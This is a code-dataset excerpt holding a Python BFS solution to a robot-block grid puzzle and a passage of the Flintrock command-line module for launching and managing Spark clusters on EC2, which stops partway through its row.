seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
40133363615 | from collections import deque
dx = [-1, 1, 0, 0]
dy = [0, 0, -1, 1]
def nextspots(board, pos, n):
    nextspots = []
    pos = list(pos)
    x1, y1, x2, y2 = pos[0][0], pos[0][1], pos[1][0], pos[1][1]
    for i in range(4):  # up, down, left, right
        nx1, ny1 = x1 + dx[i], y1 + dy[i]
        nx2, ny2 = x2 + dx[i], y2 + dy[i]
        if 0 <= nx1 < n and 0 <= nx2 < n and 0 <= ny1 < n and 0 <= ny2 < n:
            if board[nx1][ny1] == 0 and board[nx2][ny2] == 0:
                nextspots.append({(nx1, ny1), (nx2, ny2)})
    if x1 == x2:  # horizontal orientation
        for i in [-1, 1]:
            if 0 <= x1 + i < n and 0 <= x2 + i < n:
                if board[x1 + i][y1] == 0 and board[x2 + i][y2] == 0:
                    nextspots.append({(x1, y1), (x1 + i, y1)})
                    nextspots.append({(x2, y2), (x2 + i, y2)})
    elif y1 == y2:  # vertical orientation
        for i in [-1, 1]:
            if 0 <= y1 + i < n and 0 <= y2 + i < n:
                if board[x1][y1 + i] == 0 and board[x2][y2 + i] == 0:
                    nextspots.append({(x1, y1), (x1, y1 + i)})
                    nextspots.append({(x2, y2), (x2, y2 + i)})
    return nextspots
def solution(board):
    queue = deque()
    n = len(board)
    visit = []
    start = {(0, 0), (0, 1)}
    queue.append((start, 0))
    visit.append(start)
    while queue:
        pos, count = queue.popleft()
        if (n - 1, n - 1) in pos:
            return count
        for nextspot in nextspots(board, pos, n):
            if nextspot not in visit:
                queue.append((nextspot, count + 1))
                visit.append(nextspot)
    return 0 | Woojung0618/algorithmSolve | Programmers/Lv3/블록이동하기.py | 블록이동하기.py | py | 1,594 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "collections.deque",
"line_number": 31,
"usage_type": "call"
}
] |
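A quick hand-worked sanity check for the solution above (the board and expected move count are assumptions of this note, not dataset values): on an empty 3x3 board the 1x2 robot starting on (0,0)/(0,1) can reach the goal cell (2,2) in three translations (right, down, down).

    # 0 = free cell, 1 = wall; illustrative assertion only
    assert solution([[0, 0, 0], [0, 0, 0], [0, 0, 0]]) == 3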
29123820566 | import os
import posixpath
import errno
import json
import resource
import sys
import shutil
import textwrap
import urllib.parse
import urllib.request
import warnings
import logging
# External modules
import click
import yaml
# We import botocore here so we can catch when the user tries to
# access AWS without having their credentials configured and provide
# a friendly error message. Apart from that, flintrock.py should
# not really know anything about EC2 or boto since that is delegated
# to ec2.py.
import botocore
# Flintrock modules
from . import ec2
from .exceptions import (
UsageError,
UnsupportedProviderError,
NothingToDo,
Error)
from flintrock import __version__
from .util import spark_hadoop_build_version
from .services import HDFS, Spark # TODO: Remove this dependency.
FROZEN = getattr(sys, 'frozen', False)
if FROZEN:
THIS_DIR = sys._MEIPASS
else:
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
logger = logging.getLogger('flintrock.flintrock')
def format_message(*, message: str, indent: int=4, wrap: int=70):
"""
Format a lengthy message for printing to screen.
"""
return textwrap.indent(
textwrap.fill(
textwrap.dedent(text=message),
width=wrap),
prefix=' ' * indent)
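# Illustrative call (hypothetical values): format_message(message="a b c", indent=2, wrap=5)
# dedents the text, wraps it at 5 columns, and indents every resulting line by two spaces.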
def option_name_to_variable_name(option: str):
"""
Convert an option name like `--ec2-user` to the Python name it gets mapped to,
like `ec2_user`.
"""
return option.replace('--', '', 1).replace('-', '_')
def variable_name_to_option_name(variable: str):
"""
Convert a variable name like `ec2_user` to the Click option name it gets mapped to,
like `--ec2-user`.
"""
return '--' + variable.replace('_', '-')
def option_requires(
*,
option: str,
conditional_value=None,
requires_all: list=[],
requires_any: list=[],
scope: dict):
"""
Raise an exception if an option's requirements are not met.
The option's requirements are checked only if the option has a "truthy" value
(i.e. it's not a "falsy" value like '', None, or False), and if its value is
equal to conditional_value, if conditional_value is not None.
requires_all: Every option in this list must be defined.
requires_any: At least one option in this list must be defined.
This function looks for values by converting the option names to their
corresponding variable names (e.g. --option-a becomes option_a) and looking them
up in the provided scope.
"""
option_value = scope[option_name_to_variable_name(option)]
if option_value and \
(conditional_value is None or option_value == conditional_value):
if requires_all:
for required_option in requires_all:
required_name = option_name_to_variable_name(required_option)
if required_name not in scope or not scope[required_name]:
raise UsageError(
"Error: Missing option \"{missing_option}\" is required by "
"\"{option}{space}{conditional_value}\"."
.format(
missing_option=required_option,
option=option,
space=' ' if conditional_value is not None else '',
conditional_value=conditional_value if conditional_value is not None else ''))
if requires_any:
for required_option in requires_any:
required_name = option_name_to_variable_name(required_option)
if required_name in scope and scope[required_name] is not None:
break
else:
raise UsageError(
"Error: \"{option}{space}{conditional_value}\" requires at least "
"one of the following options to be set: {at_least}"
.format(
option=option,
space=' ' if conditional_value is not None else '',
conditional_value=conditional_value if conditional_value is not None else '',
at_least=', '.join(['"' + ra + '"' for ra in requires_any])))
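# Concretely, launch() below uses this as, e.g., option_requires(option='--install-hdfs',
# requires_all=['--hdfs-version'], scope=locals()), which raises UsageError when
# --install-hdfs is set but --hdfs-version is not.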
def mutually_exclusive(*, options: list, scope: dict):
"""
Raise an exception if more than one of the provided options is specified.
This function looks for values by converting the option names to their
corresponding variable names (e.g. --option-a becomes option_a) and looking them
up in the provided scope.
"""
mutually_exclusive_names = [option_name_to_variable_name(o) for o in options]
used_options = set()
for name, value in scope.items():
if name in mutually_exclusive_names and scope[name]: # is not None:
used_options.add(name)
if len(used_options) > 1:
bad_option1 = used_options.pop()
bad_option2 = used_options.pop()
raise UsageError(
"Error: \"{option1}\" and \"{option2}\" are mutually exclusive.\n"
" {option1}: {value1}\n"
" {option2}: {value2}"
.format(
option1=variable_name_to_option_name(bad_option1),
value1=scope[bad_option1],
option2=variable_name_to_option_name(bad_option2),
value2=scope[bad_option2]))
def get_config_file() -> str:
"""
Get the path to Flintrock's default configuration file.
"""
config_dir = click.get_app_dir(app_name='Flintrock')
config_file = os.path.join(config_dir, 'config.yaml')
return config_file
def configure_log(debug: bool):
root_logger = logging.getLogger('flintrock')
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
if debug:
root_logger.setLevel(logging.DEBUG)
handler.setFormatter(logging.Formatter('%(asctime)s - flintrock.%(module)-9s - %(levelname)-5s - %(message)s'))
else:
root_logger.setLevel(logging.INFO)
handler.setFormatter(logging.Formatter('%(message)s'))
root_logger.addHandler(handler)
def build_hdfs_download_url(ctx, param, value):
hdfs_version = ctx.params['hdfs_version']
if value.endswith('.gz') or value.endswith('.tgz'):
logger.warning(
"Hadoop download source appears to point to a file, not a directory. "
"Flintrock will not try to determine the correct file to download based on "
"the Hadoop version."
)
hdfs_download_url = value
else:
hdfs_download_url = (value.rstrip('/') + '/hadoop-{v}.tar.gz')
return hdfs_download_url.format(v=hdfs_version)
def build_spark_download_url(ctx, param, value):
spark_version = ctx.params['spark_version']
hadoop_version = ctx.params['hdfs_version']
hadoop_build_version = spark_hadoop_build_version(hadoop_version)
# Starting in Spark 3.3.0, the build artifact naming scheme changed a bit.
# Instead of 'hadoop3.2', for example, that part now reads 'hadoop3'.
if spark_version:
spark_version_tuple = tuple(map(int, spark_version.split('.')))
if spark_version_tuple >= (3, 3, 0):
hadoop_build_version = hadoop_build_version.split('.')[0]
if value.endswith('.gz') or value.endswith('.tgz'):
logger.warning(
"Spark download source appears to point to a file, not a directory. "
"Flintrock will not try to determine the correct file to download based on "
"the Spark and Hadoop versions."
)
spark_download_url = value
else:
spark_download_url = (value.rstrip('/') + '/spark-{v}-bin-{hv}.tgz')
return spark_download_url.format(
v=spark_version,
hv=hadoop_build_version,
)
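# Concretely: Spark 3.2.x artifacts are named like spark-3.2.4-bin-hadoop3.2.tgz,
# while Spark 3.3.0 and later read like spark-3.3.0-bin-hadoop3.tgz.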
def validate_download_source(url):
if 'spark' in url:
software = 'Spark'
elif 'hadoop' in url:
software = 'Hadoop'
else:
software = 'software'
parsed_url = urllib.parse.urlparse(url)
if parsed_url.netloc == 'www.apache.org' and parsed_url.path == '/dyn/closer.lua':
logger.warning(
"Warning: "
"Downloading {software} from an Apache mirror. Apache mirrors are "
"often slow and unreliable, and typically only serve the most recent releases. "
"We strongly recommend you specify a custom download source. "
"For more background on this issue, please see: https://github.com/nchammas/flintrock/issues/238"
.format(
software=software,
)
)
try:
urllib.request.urlopen(url)
except urllib.error.HTTPError as e:
raise Error(
"Error: Could not access {software} download. Maybe try a more recent release?\n"
" - Automatically redirected to: {url}\n"
" - HTTP error: {code}"
.format(
software=software,
url=e.url,
code=e.code,
)
)
@click.group()
@click.option(
'--config',
help="Path to a Flintrock configuration file.",
default=get_config_file())
@click.option('--provider', default='ec2', type=click.Choice(['ec2']))
@click.version_option(version=__version__)
# TODO: implement some solution like in https://github.com/pallets/click/issues/108
@click.option('--debug/--no-debug', default=False, help="Show debug information.")
@click.pass_context
def cli(cli_context, config, provider, debug):
"""
Flintrock
A command-line tool for launching Apache Spark clusters.
"""
cli_context.obj['provider'] = provider
if os.path.isfile(config):
with open(config) as f:
config_raw = yaml.safe_load(f)
debug = config_raw.get('debug') or debug
config_map = config_to_click(normalize_keys(config_raw))
cli_context.default_map = config_map
else:
if config != get_config_file():
raise FileNotFoundError(errno.ENOENT, 'No such file', config)
configure_log(debug=debug)
@cli.command()
@click.argument('cluster-name')
@click.option('--num-slaves', type=click.IntRange(min=1), required=True)
@click.option('--java-version', type=click.IntRange(min=8), default=11)
@click.option('--install-hdfs/--no-install-hdfs', default=False)
@click.option('--hdfs-version', default='3.3.4')
@click.option('--hdfs-download-source',
help=(
"URL to download Hadoop from. If an S3 URL, Flintrock will use the "
"AWS CLI from the cluster nodes to download it. "
"Flintrock will append the appropriate file name to the end "
"of the URL based on the Apache release file names here: "
"https://dist.apache.org/repos/dist/release/hadoop/common/"
),
default='https://www.apache.org/dyn/closer.lua?action=download&filename=hadoop/common/hadoop-{v}/',
show_default=True,
callback=build_hdfs_download_url)
@click.option('--install-spark/--no-install-spark', default=True)
@click.option('--spark-executor-instances', default=1,
help="How many executor instances per worker.")
@click.option('--spark-version',
# Don't set a default here because it will conflict with
# the config file if the git commit is set.
# See: https://github.com/nchammas/flintrock/issues/190
# default=,
help="Spark release version to install.")
@click.option('--spark-download-source',
help=(
"URL to download Spark from. If an S3 URL, Flintrock will use the "
"AWS CLI from the cluster nodes to download it. "
"Flintrock will append the appropriate file "
"name to the end of the URL based on the selected Hadoop version and "
"Apache release file names here: "
"https://dist.apache.org/repos/dist/release/spark/"
),
default='https://www.apache.org/dyn/closer.lua?action=download&filename=spark/spark-{v}/',
show_default=True,
callback=build_spark_download_url)
@click.option('--spark-git-commit',
help="Git commit to build Spark from. "
"Set to 'latest' to build Spark from the latest commit on the "
"repository's default branch.")
@click.option('--spark-git-repository',
help="Git repository to clone Spark from.",
default='https://github.com/apache/spark',
show_default=True)
@click.option('--assume-yes/--no-assume-yes', default=False)
@click.option('--ec2-key-name')
@click.option('--ec2-identity-file',
type=click.Path(exists=True, dir_okay=False),
help="Path to SSH .pem file for accessing nodes.")
@click.option('--ec2-instance-type', default='m5.medium', show_default=True)
@click.option('--ec2-region', default='us-east-1', show_default=True)
# We set some of these defaults to empty strings because of boto3's parameter validation.
# See: https://github.com/boto/boto3/issues/400
@click.option('--ec2-availability-zone', default='')
@click.option('--ec2-ami')
@click.option('--ec2-user')
@click.option('--ec2-security-group', 'ec2_security_groups',
multiple=True,
help="Additional security groups names to assign to the instances. "
"You can specify this option multiple times.")
@click.option('--ec2-spot-price', type=float)
@click.option('--ec2-spot-request-duration', default='7d',
help="Duration a spot request is valid (e.g. 3d 2h 1m).")
@click.option('--ec2-min-root-ebs-size-gb', type=int, default=30)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.option('--ec2-subnet-id', default='')
@click.option('--ec2-instance-profile-name', default='')
@click.option('--ec2-placement-group', default='')
@click.option('--ec2-tenancy', default='default')
@click.option('--ec2-ebs-optimized/--no-ec2-ebs-optimized', default=False)
@click.option('--ec2-instance-initiated-shutdown-behavior', default='stop',
type=click.Choice(['stop', 'terminate']))
@click.option('--ec2-user-data',
type=click.File(mode='r', encoding='utf-8'),
help="Path to EC2 user data script that will run on instance launch.")
@click.option('--ec2-tag', 'ec2_tags',
callback=ec2.cli_validate_tags,
multiple=True,
help="Additional tags (e.g. 'Key,Value') to assign to the instances. "
"You can specify this option multiple times.")
@click.option('--ec2-authorize-access-from',
callback=ec2.cli_validate_ec2_authorize_access,
multiple=True,
help=(
"Authorize cluster access from a specific source (e.g. on a private "
"network). The source can be a) a plain IP address, b) an IP "
"address in CIDR notation, or c) an EC2 Security Group ID. "
"Using this option disables automatic detection of client's public IP "
"address."
))
@click.pass_context
def launch(
cli_context,
cluster_name,
num_slaves,
java_version,
install_hdfs,
hdfs_version,
hdfs_download_source,
install_spark,
spark_executor_instances,
spark_version,
spark_git_commit,
spark_git_repository,
spark_download_source,
assume_yes,
ec2_key_name,
ec2_identity_file,
ec2_instance_type,
ec2_region,
ec2_availability_zone,
ec2_ami,
ec2_user,
ec2_security_groups,
ec2_spot_price,
ec2_spot_request_duration,
ec2_min_root_ebs_size_gb,
ec2_vpc_id,
ec2_subnet_id,
ec2_instance_profile_name,
ec2_placement_group,
ec2_tenancy,
ec2_ebs_optimized,
ec2_instance_initiated_shutdown_behavior,
ec2_user_data,
ec2_tags,
ec2_authorize_access_from):
"""
Launch a new cluster.
"""
provider = cli_context.obj['provider']
services = []
option_requires(
option='--install-hdfs',
requires_all=['--hdfs-version'],
scope=locals())
option_requires(
option='--install-spark',
requires_any=[
'--spark-version',
'--spark-git-commit'],
scope=locals())
mutually_exclusive(
options=[
'--spark-version',
'--spark-git-commit'],
scope=locals())
option_requires(
option='--install-spark',
requires_all=[
'--hdfs-version'],
scope=locals())
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=[
'--ec2-key-name',
'--ec2-identity-file',
'--ec2-instance-type',
'--ec2-region',
'--ec2-ami',
'--ec2-user'],
scope=locals())
# The subnet is required for non-default VPCs because EC2 does not
# support user-defined default subnets.
# See: https://forums.aws.amazon.com/thread.jspa?messageID=707417
# https://github.com/mitchellh/packer/issues/1935#issuecomment-111235752
option_requires(
option='--ec2-vpc-id',
requires_all=['--ec2-subnet-id'],
scope=locals())
check_external_dependency('ssh-keygen')
if install_hdfs:
validate_download_source(hdfs_download_source)
hdfs = HDFS(
version=hdfs_version,
download_source=hdfs_download_source,
)
services += [hdfs]
if install_spark:
if spark_version:
validate_download_source(spark_download_source)
spark = Spark(
spark_executor_instances=spark_executor_instances,
version=spark_version,
hadoop_version=hdfs_version,
download_source=spark_download_source,
)
elif spark_git_commit:
logger.warning(
"Warning: Building Spark takes a long time. "
"e.g. 15-20 minutes on an m5.xlarge instance on EC2.")
if spark_git_commit == 'latest':
spark_git_commit = get_latest_commit(spark_git_repository)
logger.info("Building Spark at latest commit: {c}".format(c=spark_git_commit))
spark = Spark(
spark_executor_instances=spark_executor_instances,
git_commit=spark_git_commit,
git_repository=spark_git_repository,
hadoop_version=hdfs_version,
)
services += [spark]
if provider == 'ec2':
cluster = ec2.launch(
cluster_name=cluster_name,
num_slaves=num_slaves,
java_version=java_version,
services=services,
assume_yes=assume_yes,
key_name=ec2_key_name,
identity_file=ec2_identity_file,
instance_type=ec2_instance_type,
region=ec2_region,
availability_zone=ec2_availability_zone,
ami=ec2_ami,
user=ec2_user,
security_groups=ec2_security_groups,
spot_price=ec2_spot_price,
spot_request_duration=ec2_spot_request_duration,
min_root_ebs_size_gb=ec2_min_root_ebs_size_gb,
vpc_id=ec2_vpc_id,
subnet_id=ec2_subnet_id,
instance_profile_name=ec2_instance_profile_name,
placement_group=ec2_placement_group,
tenancy=ec2_tenancy,
ebs_optimized=ec2_ebs_optimized,
instance_initiated_shutdown_behavior=ec2_instance_initiated_shutdown_behavior,
user_data=ec2_user_data,
tags=ec2_tags,
ec2_authorize_access_from=ec2_authorize_access_from)
else:
raise UnsupportedProviderError(provider)
print("Cluster master: {}".format(cluster.master_host))
print("Login with: flintrock login {}".format(cluster.name))
def get_latest_commit(github_repository: str):
"""
Get the latest commit on the default branch of a repository hosted on GitHub.
"""
parsed_url = urllib.parse.urlparse(github_repository)
repo_domain, repo_path = parsed_url.netloc, parsed_url.path.strip('/')
if repo_domain != 'github.com':
raise UsageError(
"Error: Getting the latest commit is only supported "
"for repositories hosted on GitHub. "
"Provided repository domain was: {d}".format(d=repo_domain))
url = "https://api.github.com/repos/{rp}/commits".format(rp=repo_path)
try:
with urllib.request.urlopen(url) as response:
result = json.loads(response.read().decode('utf-8'))
return result[0]['sha']
except Exception as e:
raise Exception(
"Could not get latest commit for repository: {r}"
.format(r=repo_path)) from e
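# Illustrative call: get_latest_commit('https://github.com/apache/spark') returns the
# SHA of the newest commit on the repository's default branch via the GitHub API.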
@cli.command()
@click.argument('cluster-name')
@click.option('--assume-yes/--no-assume-yes', default=False)
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.pass_context
def destroy(cli_context, cluster_name, assume_yes, ec2_region, ec2_vpc_id):
"""
Destroy a cluster.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=['--ec2-region'],
scope=locals())
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
else:
raise UnsupportedProviderError(provider)
if not assume_yes:
cluster.print()
click.confirm(
text="Are you sure you want to destroy this cluster?",
abort=True)
logger.info("Destroying {c}...".format(c=cluster.name))
cluster.destroy()
@cli.command()
@click.argument('cluster-name', required=False)
@click.option('--master-hostname-only', is_flag=True, default=False)
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.pass_context
def describe(
cli_context,
cluster_name,
master_hostname_only,
ec2_region,
ec2_vpc_id):
"""
Describe an existing cluster.
Leave out the cluster name to find all Flintrock-managed clusters.
The output of this command is both human- and machine-friendly. Full cluster
descriptions are output in YAML.
"""
provider = cli_context.obj['provider']
search_area = ""
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=['--ec2-region'],
scope=locals())
if cluster_name:
cluster_names = [cluster_name]
else:
cluster_names = []
if provider == 'ec2':
search_area = "in region {r}".format(r=ec2_region)
clusters = ec2.get_clusters(
cluster_names=cluster_names,
region=ec2_region,
vpc_id=ec2_vpc_id)
else:
raise UnsupportedProviderError(provider)
if cluster_name:
cluster = clusters[0]
if master_hostname_only:
logger.info(cluster.master_host)
else:
cluster.print()
else:
if master_hostname_only:
for cluster in sorted(clusters, key=lambda x: x.name):
logger.info("{}: {}".format(cluster.name, cluster.master_host))
else:
logger.info("Found {n} cluster{s}{space}{search_area}.".format(
n=len(clusters),
s='' if len(clusters) == 1 else 's',
space=' ' if search_area else '',
search_area=search_area))
if clusters:
logger.info('---')
for cluster in sorted(clusters, key=lambda x: x.name):
cluster.print()
# TODO: Provide different command or option for going straight to Spark Shell. (?)
@cli.command()
@click.argument('cluster-name')
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
# TODO: Move identity-file to global, non-provider-specific option. (?)
@click.option('--ec2-identity-file',
type=click.Path(exists=True, dir_okay=False),
help="Path to SSH .pem file for accessing nodes.")
@click.option('--ec2-user')
@click.pass_context
def login(cli_context, cluster_name, ec2_region, ec2_vpc_id, ec2_identity_file, ec2_user):
"""
Login to the master of an existing cluster.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=[
'--ec2-region',
'--ec2-identity-file',
'--ec2-user'],
scope=locals())
check_external_dependency('ssh')
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
user = ec2_user
identity_file = ec2_identity_file
else:
raise UnsupportedProviderError(provider)
# TODO: Check that master up first and error out cleanly if not
# via ClusterInvalidState.
cluster.login(user=user, identity_file=identity_file)
@cli.command()
@click.argument('cluster-name')
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
# TODO: Move identity-file to global, non-provider-specific option. (?)
@click.option('--ec2-identity-file',
type=click.Path(exists=True, dir_okay=False),
help="Path to SSH .pem file for accessing nodes.")
@click.option('--ec2-user')
@click.pass_context
def start(cli_context, cluster_name, ec2_region, ec2_vpc_id, ec2_identity_file, ec2_user):
"""
Start an existing, stopped cluster.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=[
'--ec2-region',
'--ec2-identity-file',
'--ec2-user'],
scope=locals())
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
user = ec2_user
identity_file = ec2_identity_file
else:
raise UnsupportedProviderError(provider)
cluster.start_check()
logger.info("Starting {c}...".format(c=cluster_name))
cluster.start(user=user, identity_file=identity_file)
@cli.command()
@click.argument('cluster-name')
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.option('--assume-yes/--no-assume-yes', default=False)
@click.pass_context
def stop(cli_context, cluster_name, ec2_region, ec2_vpc_id, assume_yes):
"""
Stop an existing, running cluster.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=['--ec2-region'],
scope=locals())
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
else:
raise UnsupportedProviderError(provider)
cluster.stop_check()
if not assume_yes:
cluster.print()
click.confirm(
text="Are you sure you want to stop this cluster?",
abort=True)
logger.info("Stopping {c}...".format(c=cluster_name))
cluster.stop()
logger.info("{c} is now stopped.".format(c=cluster_name))
@cli.command(name='add-slaves')
@click.argument('cluster-name')
@click.option('--num-slaves', type=click.IntRange(min=1), required=True)
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.option('--ec2-identity-file',
type=click.Path(exists=True, dir_okay=False),
help="Path to SSH .pem file for accessing nodes.")
@click.option('--ec2-user')
@click.option('--ec2-spot-price', type=float)
@click.option('--ec2-spot-request-duration', default='7d',
help="Duration a spot request is valid (e.g. 3d 2h 1m).")
@click.option('--ec2-min-root-ebs-size-gb', type=int, default=30)
@click.option('--assume-yes/--no-assume-yes', default=False)
@click.option('--ec2-tag', 'ec2_tags',
callback=ec2.cli_validate_tags,
multiple=True,
help="Additional tags (e.g. 'Key,Value') to assign to the instances. "
"You can specify this option multiple times.")
@click.pass_context
def add_slaves(
cli_context,
cluster_name,
num_slaves,
ec2_region,
ec2_vpc_id,
ec2_identity_file,
ec2_user,
ec2_spot_price,
ec2_spot_request_duration,
ec2_min_root_ebs_size_gb,
ec2_tags,
assume_yes):
"""
Add slaves to an existing cluster.
Flintrock will configure new slaves based on information queried
automatically from the master.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=[
'--ec2-region',
'--ec2-identity-file',
'--ec2-user'],
scope=locals())
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
user = ec2_user
identity_file = ec2_identity_file
provider_options = {
'min_root_ebs_size_gb': ec2_min_root_ebs_size_gb,
'spot_price': ec2_spot_price,
'spot_request_duration': ec2_spot_request_duration,
'tags': ec2_tags
}
else:
raise UnsupportedProviderError(provider)
if cluster.num_masters == 0:
raise Error(
"Cannot add slaves to cluster '{c}' since it does not "
"appear to have a master."
.format(
c=cluster_name))
cluster.load_manifest(
user=user,
identity_file=identity_file)
cluster.add_slaves_check()
if provider == 'ec2':
cluster.add_slaves(
user=user,
identity_file=identity_file,
num_slaves=num_slaves,
assume_yes=assume_yes,
**provider_options)
@cli.command(name='remove-slaves')
@click.argument('cluster-name')
@click.option('--num-slaves', type=click.IntRange(min=1), required=True)
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.option('--ec2-user')
@click.option('--ec2-identity-file',
type=click.Path(exists=True, dir_okay=False),
help="Path to SSH .pem file for accessing nodes.")
@click.option('--assume-yes/--no-assume-yes', default=False)
@click.pass_context
def remove_slaves(
cli_context,
cluster_name,
num_slaves,
ec2_region,
ec2_vpc_id,
ec2_user,
ec2_identity_file,
assume_yes):
"""
Remove slaves from an existing cluster.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=[
'--ec2-region',
'--ec2-user',
'--ec2-identity-file'],
scope=locals())
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
user = ec2_user
identity_file = ec2_identity_file
else:
raise UnsupportedProviderError(provider)
if num_slaves > cluster.num_slaves:
logger.warning(
"Warning: Cluster has {c} slave{cs}. "
"You asked to remove {n} slave{ns}."
.format(
c=cluster.num_slaves,
cs='' if cluster.num_slaves == 1 else 's',
n=num_slaves,
ns='' if num_slaves == 1 else 's'))
num_slaves = cluster.num_slaves
if not assume_yes:
cluster.print()
click.confirm(
text=("Are you sure you want to remove {n} slave{s} from this cluster?"
.format(
n=num_slaves,
s='' if num_slaves == 1 else 's')),
abort=True)
logger.info("Removing {n} slave{s}..."
.format(
n=num_slaves,
s='' if num_slaves == 1 else 's'))
cluster.remove_slaves(
user=user,
identity_file=identity_file,
num_slaves=num_slaves)
@cli.command(name='run-command')
@click.argument('cluster-name')
@click.argument('command', nargs=-1)
@click.option('--master-only', help="Run on the master only.", is_flag=True)
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.option('--ec2-identity-file',
type=click.Path(exists=True, dir_okay=False),
help="Path to SSH .pem file for accessing nodes.")
@click.option('--ec2-user')
@click.pass_context
def run_command(
cli_context,
cluster_name,
command,
master_only,
ec2_region,
ec2_vpc_id,
ec2_identity_file,
ec2_user):
"""
Run a shell command on a cluster.
Examples:
flintrock run-command my-cluster 'touch /tmp/flintrock'
flintrock run-command my-cluster -- yum install -y package
Flintrock will return a non-zero code if any of the cluster nodes raises an error
while running the command.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=[
'--ec2-region',
'--ec2-identity-file',
'--ec2-user'],
scope=locals())
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
user = ec2_user
identity_file = ec2_identity_file
else:
raise UnsupportedProviderError(provider)
cluster.run_command_check()
logger.info("Running command on {target}...".format(
target="master only" if master_only else "cluster"))
cluster.run_command(
command=command,
master_only=master_only,
user=user,
identity_file=identity_file)
@cli.command(name='copy-file')
@click.argument('cluster-name')
@click.argument('local_path', type=click.Path(exists=True, dir_okay=False))
@click.argument('remote_path', type=click.Path())
@click.option('--master-only', help="Copy to the master only.", is_flag=True)
@click.option('--ec2-region', default='us-east-1', show_default=True)
@click.option('--ec2-vpc-id', default='', help="Leave empty for default VPC.")
@click.option('--ec2-identity-file',
type=click.Path(exists=True, dir_okay=False),
help="Path to SSH .pem file for accessing nodes.")
@click.option('--ec2-user')
@click.option('--assume-yes/--no-assume-yes', default=False, help="Prompt before large uploads.")
@click.pass_context
def copy_file(
cli_context,
cluster_name,
local_path,
remote_path,
master_only,
ec2_region,
ec2_vpc_id,
ec2_identity_file,
ec2_user,
assume_yes):
"""
Copy a local file up to a cluster.
This will copy the file to the same path on each node of the cluster.
Examples:
flintrock copy-file my-cluster /tmp/file.102.txt /tmp/file.txt
flintrock copy-file my-cluster /tmp/spark-defaults.conf /tmp/
Flintrock will return a non-zero code if any of the cluster nodes raises an error.
"""
provider = cli_context.obj['provider']
option_requires(
option='--provider',
conditional_value='ec2',
requires_all=[
'--ec2-region',
'--ec2-identity-file',
'--ec2-user'],
scope=locals())
# We assume POSIX for the remote path since Flintrock
# only supports clusters running CentOS / Amazon Linux.
if not posixpath.basename(remote_path):
remote_path = posixpath.join(remote_path, os.path.basename(local_path))
if provider == 'ec2':
cluster = ec2.get_cluster(
cluster_name=cluster_name,
region=ec2_region,
vpc_id=ec2_vpc_id)
user = ec2_user
identity_file = ec2_identity_file
else:
raise UnsupportedProviderError(provider)
cluster.copy_file_check()
if not assume_yes and not master_only:
file_size_bytes = os.path.getsize(local_path)
num_nodes = len(cluster.slave_ips) + 1 # TODO: cluster.num_nodes
total_size_bytes = file_size_bytes * num_nodes
if total_size_bytes > 10 ** 6:
logger.warning("WARNING:")
logger.warning(
format_message(
message="""\
You are trying to upload {total_size} bytes ({size} bytes x {count}
nodes in {cluster}). Depending on your upload bandwidth, this may take
a long time.
You may be better off uploading this file to a storage service like
Amazon S3 and downloading it from there to the cluster using
`flintrock run-command ...`.
""".format(
size=file_size_bytes,
count=num_nodes,
cluster=cluster_name,
total_size=total_size_bytes),
wrap=60))
click.confirm(
text="Are you sure you want to continue?",
default=True,
abort=True)
logger.info("Copying file to {target}...".format(
target="master only" if master_only else "cluster"))
cluster.copy_file(
local_path=local_path,
remote_path=remote_path,
master_only=master_only,
user=user,
identity_file=identity_file)
def normalize_keys(obj):
"""
Used to map keys from config files to Python parameter names.
"""
if type(obj) != dict:
return obj
else:
return {k.replace('-', '_'): normalize_keys(v) for k, v in obj.items()}
